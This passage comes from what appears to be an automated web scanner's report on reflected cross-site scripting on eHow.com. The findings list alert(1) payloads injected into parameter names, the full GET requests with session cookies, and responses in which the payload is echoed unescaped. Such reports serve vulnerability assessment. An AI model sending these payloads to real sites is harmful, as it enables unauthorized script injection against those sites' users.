User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.343. http://www.ehow.com/careers/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da1da'-alert(1)-'b38942ddcfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /careers/?da1da'-alert(1)-'b38942ddcfd=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:28 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75360

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Careers - How To Information | eHow.com</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/careers/?da1da'-alert(1)-'b38942ddcfd=1" ref="like" width="300">
...[SNIP]...

4.344. http://www.ehow.com/cars/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/cars/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9209d'-alert(1)-'45b907ee68f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cars/?9209d'-alert(1)-'45b907ee68f=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:23 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70759

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Cars - How To Information | eHow.com</title>
<
...[SNIP]...
<fb:like href="http://www.ehow.com/cars/?9209d'-alert(1)-'45b907ee68f=1" ref="like" width="300">
...[SNIP]...

4.345. http://www.ehow.com/computer-software/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/computer-software/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 206d4'-alert(1)-'dbefd3749fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /computer-software/?206d4'-alert(1)-'dbefd3749fe=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.346. http://www.ehow.com/computers/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/computers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdff3'-alert(1)-'174bc4ab464 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /computers/?fdff3'-alert(1)-'174bc4ab464=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.347. http://www.ehow.com/culture-and-society/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/culture-and-society/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b5e0'-alert(1)-'eff10e5d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /culture-and-society/?2b5e0'-alert(1)-'eff10e5d87=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72021

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Culture & Society - How To Information | eHow.com
...[SNIP]...
<fb:like href="http://www.ehow.com/culture-and-society/?2b5e0'-alert(1)-'eff10e5d87=1" ref="like" width="300">
...[SNIP]...

4.348. http://www.ehow.com/diseases-and-conditions/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/diseases-and-conditions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8faf8'-alert(1)-'92bb278d1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /diseases-and-conditions/?8faf8'-alert(1)-'92bb278d1ba=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:32 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71305

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Diseases & Conditions - How To Information | eHow
...[SNIP]...
<fb:like href="http://www.ehow.com/diseases-and-conditions/?8faf8'-alert(1)-'92bb278d1ba=1" ref="like" width="300">
...[SNIP]...

4.349. http://www.ehow.com/drugs-and-supplements/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/drugs-and-supplements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe97d'-alert(1)-'7b1d74f9c1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /drugs-and-supplements/?fe97d'-alert(1)-'7b1d74f9c1b=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.350. http://www.ehow.com/education/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/education/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6087c'-alert(1)-'194ef36dd58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /education/?6087c'-alert(1)-'194ef36dd58=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:02 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75234

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Education - How To Information | eHow.com</title>
...[SNIP]...
<fb:like href="http://www.ehow.com/education/?6087c'-alert(1)-'194ef36dd58=1" ref="like" width="300">
...[SNIP]...

4.351. http://www.ehow.com/ehow-family/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-family/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c767"><script>alert(1)</script>be6c4ab1e42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ehow-family/?7c767"><script>alert(1)</script>be6c4ab1e42=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45027

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>eHow Family | eHow.com
</title>
<meta charset
...[SNIP]...
<fb:like ref="like" href="http://www.ehow.com/ehow-family/?7c767"><script>alert(1)</script>be6c4ab1e42=1" width="300">
...[SNIP]...

4.352. http://www.ehow.com/ehow-food/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-food/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b3a1"><script>alert(1)</script>79143987f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ehow-food/?6b3a1"><script>alert(1)</script>79143987f86=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46088

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>eHow Food | eHow.com
</title>
<meta charset="
...[SNIP]...
<fb:like ref="like" href="http://www.ehow.com/ehow-food/?6b3a1"><script>alert(1)</script>79143987f86=1" width="300">
...[SNIP]...

4.353. http://www.ehow.com/ehow-health/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-health/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f509"><script>alert(1)</script>873ede6293d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ehow-health/?3f509"><script>alert(1)</script>873ede6293d=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43261

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>eHow Health | eHow.com
</title>
<meta charset
...[SNIP]...
<fb:like ref="like" href="http://www.ehow.com/ehow-health/?3f509"><script>alert(1)</script>873ede6293d=1" width="300">
...[SNIP]...

4.354. http://www.ehow.com/ehow-home/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3196"><script>alert(1)</script>92b0e28812b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ehow-home/?d3196"><script>alert(1)</script>92b0e28812b=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45054

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>eHow Home | eHow.com
</title>
<meta charset="
...[SNIP]...
<fb:like ref="like" href="http://www.ehow.com/ehow-home/?d3196"><script>alert(1)</script>92b0e28812b=1" width="300">
...[SNIP]...

4.355. http://www.ehow.com/ehow-money/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-money/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5f86"><script>alert(1)</script>d7f01f7f7f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ehow-money/?f5f86"><script>alert(1)</script>d7f01f7f7f6=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46741

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>eHow Money | eHow.com
</title>
<meta charset=
...[SNIP]...
<fb:like ref="like" href="http://www.ehow.com/ehow-money/?f5f86"><script>alert(1)</script>d7f01f7f7f6=1" width="300">
...[SNIP]...

4.356. http://www.ehow.com/ehow-style/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-style/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497ab"><script>alert(1)</script>953c40a3a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ehow-style/?497ab"><script>alert(1)</script>953c40a3a58=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45257

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>eHow Style | eHow.com
</title>
<meta charset=
...[SNIP]...
<fb:like ref="like" href="http://www.ehow.com/ehow-style/?497ab"><script>alert(1)</script>953c40a3a58=1" width="300">
...[SNIP]...

4.357. http://www.ehow.com/ehow-tax-time/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-tax-time/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c261"><script>alert(1)</script>ad4ad1bb267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ehow-tax-time/?7c261"><script>alert(1)</script>ad4ad1bb267=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43139

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>eHow Tax Time | eHow.com
</title>
<meta chars
...[SNIP]...
<fb:like ref="like" href="http://www.ehow.com/ehow-tax-time/?7c261"><script>alert(1)</script>ad4ad1bb267=1" width="300">
...[SNIP]...

4.358. http://www.ehow.com/electronics/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/electronics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 535c5'-alert(1)-'e8bfb8c2480 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /electronics/?535c5'-alert(1)-'e8bfb8c2480=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70812

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Electronics - How To Information | eHow.com</titl
...[SNIP]...
<fb:like href="http://www.ehow.com/electronics/?535c5'-alert(1)-'e8bfb8c2480=1" ref="like" width="300">
...[SNIP]...

4.359. http://www.ehow.com/family-health/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/family-health/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3603c'-alert(1)-'0c79c8c5b9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /family-health/?3603c'-alert(1)-'0c79c8c5b9e=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72073

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Family Health - How To Information | eHow.com</ti
...[SNIP]...
<fb:like href="http://www.ehow.com/family-health/?3603c'-alert(1)-'0c79c8c5b9e=1" ref="like" width="300">
...[SNIP]...

4.360. http://www.ehow.com/fashion-and-style/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/fashion-and-style/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e622d'-alert(1)-'816f55ab996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fashion-and-style/?e622d'-alert(1)-'816f55ab996=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71917

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Fashion & Style - How To Information | eHow.com</
...[SNIP]...
<fb:like href="http://www.ehow.com/fashion-and-style/?e622d'-alert(1)-'816f55ab996=1" ref="like" width="300">
...[SNIP]...

4.361. http://www.ehow.com/fitness/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/fitness/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1122d'-alert(1)-'dc35503d8e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

